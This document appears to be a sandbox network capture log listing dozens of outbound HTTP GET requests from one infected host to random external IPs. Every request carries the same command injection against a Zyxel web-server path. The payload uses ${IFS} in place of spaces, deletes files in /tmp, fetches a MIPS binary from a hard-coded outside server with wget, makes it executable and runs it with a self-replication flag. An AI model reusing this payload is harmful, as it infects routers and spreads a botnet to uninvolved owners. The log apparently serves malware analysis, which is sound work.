                                          Jan 14, 2024 15:46:01.713912964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          935192.168.2.2339062140.118.45.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713937998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          936192.168.2.2339470196.240.66.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713948011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          937192.168.2.2336336178.232.35.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.713948011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          938192.168.2.2344678124.63.18.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714025974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          939192.168.2.2336714118.71.229.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714051008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          940192.168.2.2359192101.149.197.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714068890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          941192.168.2.236094053.88.129.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714090109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          942192.168.2.2345572122.37.225.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714133978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          943192.168.2.233314018.224.190.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714142084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          944192.168.2.2348808169.206.103.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714186907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          945192.168.2.2352770141.173.123.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714224100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          946192.168.2.2360340212.111.165.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714250088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          947192.168.2.2334586191.175.81.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714271069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          948192.168.2.2359836122.147.56.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714320898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          949192.168.2.23402889.155.51.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714329004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          950192.168.2.233372032.204.137.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714361906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          951192.168.2.2360136126.157.142.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714385986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          952192.168.2.233431287.215.181.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.714401007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          953192.168.2.235287282.49.176.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728112936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          954192.168.2.234347681.107.146.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728228092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          955192.168.2.2352198189.244.154.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728269100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          956192.168.2.233527620.67.205.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728312969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          957192.168.2.2356838195.192.221.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728317022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          958192.168.2.236069287.177.98.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728323936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          959192.168.2.2352732112.3.130.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728393078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          960192.168.2.23433202.236.126.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728441954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          961192.168.2.2357590176.55.217.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728445053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          962192.168.2.2345036177.64.116.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728540897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          963192.168.2.2337504174.159.151.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728564024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          964192.168.2.234511651.17.251.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728564024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          965192.168.2.235545285.222.247.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728571892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          966192.168.2.234247650.57.36.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728574038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          967192.168.2.2357412221.207.163.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728604078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          968192.168.2.235928620.144.189.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728610039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          969192.168.2.234875424.28.101.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728643894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          970192.168.2.2358048141.199.115.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728677034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          971192.168.2.233664454.105.61.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728737116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          972192.168.2.2335846108.143.65.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728738070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          973192.168.2.2356490176.169.40.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728751898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          974192.168.2.2350572191.121.225.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728776932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          975192.168.2.2358052126.222.130.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728820086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          976192.168.2.2358290217.110.208.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728837013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          977192.168.2.235305294.71.218.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728848934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          978192.168.2.234919652.133.46.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728907108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          979192.168.2.2358684221.146.120.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728914976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          980192.168.2.2348130221.231.193.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728960991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          981192.168.2.234888413.100.46.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728965998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          982192.168.2.233645896.138.95.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728981018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          983192.168.2.2354156184.192.186.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.728984118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          984192.168.2.2349474181.210.94.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729038954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          985192.168.2.2355024143.9.164.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729048967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          986192.168.2.2342688103.200.97.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729104996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          987192.168.2.2337510163.41.171.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729121923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          988192.168.2.2348548173.31.243.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729139090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          989192.168.2.2360478124.234.8.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729171038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          990192.168.2.2352914120.128.71.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729177952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          991192.168.2.2333306144.117.13.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729202986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          992192.168.2.2352394153.255.86.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729276896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          993192.168.2.233433851.105.36.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729278088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          994192.168.2.233740453.4.13.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729305029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          995192.168.2.2333066222.161.64.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729325056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          996192.168.2.2334984145.90.210.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.729347944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          997192.168.2.2359272115.34.57.16443
                                          TimestampBytes transferredDirectionData
